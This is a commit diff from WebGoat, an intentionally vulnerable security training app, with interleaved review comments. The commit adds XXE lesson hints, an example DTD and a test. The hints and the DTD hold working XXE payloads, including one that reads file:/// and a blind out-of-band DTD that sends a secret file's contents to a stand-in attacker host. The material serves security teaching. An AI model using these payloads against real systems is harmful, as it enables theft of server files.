Extended and fixed some lessons

This commit is contained in:
Nanne Baars
2018-05-27 20:37:44 +02:00
parent d2b6725f3b
commit 1edceb0aa8
16 changed files with 152 additions and 168 deletions


@ -4,6 +4,7 @@ import com.google.common.base.Charsets;
import com.google.common.io.Files;
import lombok.SneakyThrows;
import org.owasp.webgoat.assignments.AssignmentEndpoint;
import org.owasp.webgoat.assignments.AssignmentHints;
import org.owasp.webgoat.assignments.AssignmentPath;
import org.owasp.webgoat.assignments.AttackResult;
import org.springframework.beans.factory.annotation.Autowired;
@ -49,6 +50,7 @@ import static org.apache.commons.lang3.RandomStringUtils.randomAlphabetic;
* @since November 18, 2016
*/
@AssignmentPath("xxe/blind")
@AssignmentHints({"xxe.blind.hints.1","xxe.blind.hints.2","xxe.blind.hints.3","xxe.blind.hints.4","xxe.blind.hints.5"})
public class BlindSendFileAssignment extends AssignmentEndpoint {
static final String CONTENTS = "WebGoat 8.0 rocks... (" + randomAlphabetic(10) + ")";


@ -51,7 +51,7 @@ import static org.springframework.web.bind.annotation.RequestMethod.POST;
* @since 4/8/17.
*/
@AssignmentPath("xxe/simple")
@AssignmentHints({"xxe.hints.simple.xxe.1", "xxe.hints.simple.xxe.2", "xxe.hints.simple.xxe.3", "xxe.hints.simple.xxe.4"})
@AssignmentHints({"xxe.hints.simple.xxe.1", "xxe.hints.simple.xxe.2", "xxe.hints.simple.xxe.3", "xxe.hints.simple.xxe.4", "xxe.hints.simple.xxe.5", "xxe.hints.simple.xxe.6"})
public class SimpleXXE extends AssignmentEndpoint {
private final static String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "etc", "var"};


@ -30,9 +30,17 @@ xxe.content.output=Welcome {0} you can now login to our website
xxe.blind.output=Contents of the file is: {0}
xxe.hints.simple.xxe.1=Try submitting the form and see what happens
xxe.hints.simple.xxe.2=XXE stands for XML External Entity attack
xxe.hints.simple.xxe.3=Try to include your own DTD
xxe.hints.simple.xxe.4=Try to include a doctype "(<!DOCTYPE...)" in the xml
xxe.hints.simple.xxe.2=Use ZAP/Burp to intercept the request and try to include your own DTD
xxe.hints.simple.xxe.3=Try to include a doctype "(<!DOCTYPE...)" in the xml
xxe.hints.simple.xxe.4=The include can be as follows: <!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]>
xxe.hints.simple.xxe.5=Do not forget to reference the entity
xxe.hints.simple.xxe.6=In the comment you should references: <comment><text>&root;test</text></comment>
xxe.hints.content.type.xxe.1=Take a look at the content type
xxe.hints.content.type.xxe.2=Does the endpoint only accept json messages?
xxe.hints.content.type.xxe.2=Does the endpoint only accept json messages?
xxe.blind.hints.1=This assignment is more complicated you need to upload the contents of a file to the attackers site (WebWolf in this case)
xxe.blind.hints.2=In this case you cannot combine external entities in combination with internal entities.
xxe.blind.hints.3=Use parameter entities to perform the attack, see for example: https://www.acunetix.com/blog/articles/xml-external-entity-xxe-limitations/
xxe.blind.hints.4=An example DTD can be found here WebGoat/images/example.dtd, include this DTD in the xml comment
xxe.blind.hints.5=Use for the comment, be aware to replace the url accordingly: <?xml version="1.0"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM "http://localhost:8081/files/test1234/test.dtd">%remote;]><comment><text>test&send;</text></comment>
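Review bot: `xxe.hints.content.type.xxe.2` appears twice in this hunk with the same value (`Does the endpoint only accept json messages?`); if both lines are on the new side, the key is defined twice in the properties file and the later definition silently wins, so one of them should be removed (or renumbered if a third hint was intended). It may instead be a single changed line rendered twice, for example a whitespace-only edit, which cannot be told apart here. Separately, `xxe.hints.simple.xxe.6` reads `you should references:`; the intended wording is `you should reference:`.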


@ -0,0 +1,5 @@
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % file SYSTEM "file:/home/nbaars/.webgoat-v8.0.0.M14/XXE/secret.txt">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8081/landing?text=%file;'>">
%all;
~
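Review bot: The last line of the new file is a bare `~`, which looks like an editor end-of-buffer marker pasted in rather than DTD content; a lone `~` outside any declaration is not DTD syntax, so a parser loading this external subset is expected to reject the file, and the line should be deleted. The `SYSTEM "file:/home/nbaars/.webgoat-v8.0.0.M14/XXE/secret.txt"` identifier and the `localhost:8081` host are specific to the author's machine, and `xxe.blind.hints.4` in the properties hunk directs learners to this file as the example, so it would be clearer to ship it with an obviously placeholder path such as `file:/PATH/TO/secret.txt` and a leading `<!-- adapt the file path and host to your setup -->` comment.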


@ -3,5 +3,5 @@
In modern REST frameworks the server might be able to accepts data formats that you as a developer did not think about.
So this might result in JSON endpoints being vulnerable to XXE attacks.
Again same exercise but try to perform the same XML injection as we did in first assigment.
Again same exercise but try to perform the same XML injection as we did in first assignment.


@ -71,6 +71,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
@Test
public void solve() throws Exception {
File targetFile = new File(webGoatHomeDirectory, "/XXE/secret.txt");
//Host DTD on WebWolf site
String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
"<!ENTITY % file SYSTEM \"" + targetFile.toURI().toString() + "\">\n" +
"<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:8081/landing?text=%file;'>\">\n" +
@ -80,6 +81,8 @@ public class BlindSendFileAssignmentTest extends LessonTest {
.withStatus(200)
.withBody(dtd)));
webwolfServer.stubFor(get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200)));
//Make the request from WebGoat
String xml = "<?xml version=\"1.0\"?>" +
"<!DOCTYPE comment [" +
"<!ENTITY % remote SYSTEM \"http://localhost:8081/files/test.dtd\">" +